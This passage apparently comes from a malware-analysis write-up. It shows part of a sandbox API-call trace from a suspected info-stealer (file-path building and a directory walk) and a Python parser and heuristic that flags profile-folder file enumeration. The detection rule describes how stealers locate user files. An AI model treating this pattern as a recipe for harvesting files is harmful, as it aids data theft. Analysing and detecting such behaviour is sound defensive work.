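• lstrcat.KERNEL32(?,01158F00), ref: 00394FAB
• lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
• Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
• Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
• Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
• Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
• Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
• Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
"""

# One entry: optional "Part of subcall function XXXXXXXX:", then API.MODULE,
# optional "(arg,arg,...)", then "ref: XXXXXXXX".  Entries without arguments
# (wsprintfA above) have no parentheses and no comma before "ref:".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Well-known CSIDL values (assumption: only these few are decoded here).
CSIDL_NAMES = {
    0x05: "CSIDL_PERSONAL",        # Documents
    0x1A: "CSIDL_APPDATA",         # %APPDATA%
    0x1C: "CSIDL_LOCAL_APPDATA",   # %LOCALAPPDATA%
    0x23: "CSIDL_COMMON_APPDATA",  # %ProgramData%
    0x28: "CSIDL_PROFILE",         # %USERPROFILE%
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple              # raw hex / '?' tokens exactly as printed
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # callee the entry was hoisted from, if any


def parse_apis(text: str) -> list:
    """Parse every non-empty line; raise on anything that is not an API entry."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API entry: {line!r}")
        args = () if m["args"] is None else tuple(a.strip() for a in m["args"].split(","))
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def resolved_folders(calls: list) -> list:
    """CSIDL names passed to SHGetFolderPathA/W (second argument)."""
    names = []
    for c in calls:
        if c.api in ("SHGetFolderPathA", "SHGetFolderPathW") and len(c.args) > 1 and c.args[1] != "?":
            csidl = int(c.args[1], 16) & 0xFF      # drop CSIDL_FLAG_* high bits
            names.append(CSIDL_NAMES.get(csidl, f"CSIDL_0x{csidl:02X}"))
    return names


def classify(calls: list) -> dict:
    """Heuristic verdict for one function record (author's own rule)."""
    names = {c.api for c in calls}
    walks = bool(names & {"FindFirstFileA", "FindFirstFileW"}) and \
        bool(names & {"FindNextFileA", "FindNextFileW"})
    builds_path = bool(names & {"lstrcat", "lstrcatA", "lstrcatW", "wsprintfA",
                                "wsprintfW", "PathAppendA", "PathAppendW"})
    folders = resolved_folders(calls)
    # String compares inside the same subcall as FindFirstFile: consistent with
    # skipping "." and ".." (assumption; the compared strings are not in the report).
    walk_sub = next((c.subcall for c in calls if c.api.startswith("FindFirstFile")), None)
    compares = sum(1 for c in calls if c.api.startswith("StrCmpC") and c.subcall == walk_sub)
    if walks and folders:
        verdict = "profile-folder file enumeration"
    elif walks:
        verdict = "directory walk"
    else:
        verdict = "none"
    return {"folders": folders, "directory_walk": walks, "builds_path": builds_path,
            "name_compares_in_walk": compares, "verdict": verdict}


if __name__ == "__main__":
    for key, value in classify(parse_apis(SAMPLE)).items():
        print(f"{key}: {value}")
```

The same parser accepts the CRT-only record earlier on the page (entries such as `__getptd.LIBCMT ref: 0039C74E` have no argument list), for which `classify` returns the verdict `none`; the rule is deliberately narrow so that it only fires on the folder-resolve plus directory-walk combination, which is the part of this record that matters for a stealer.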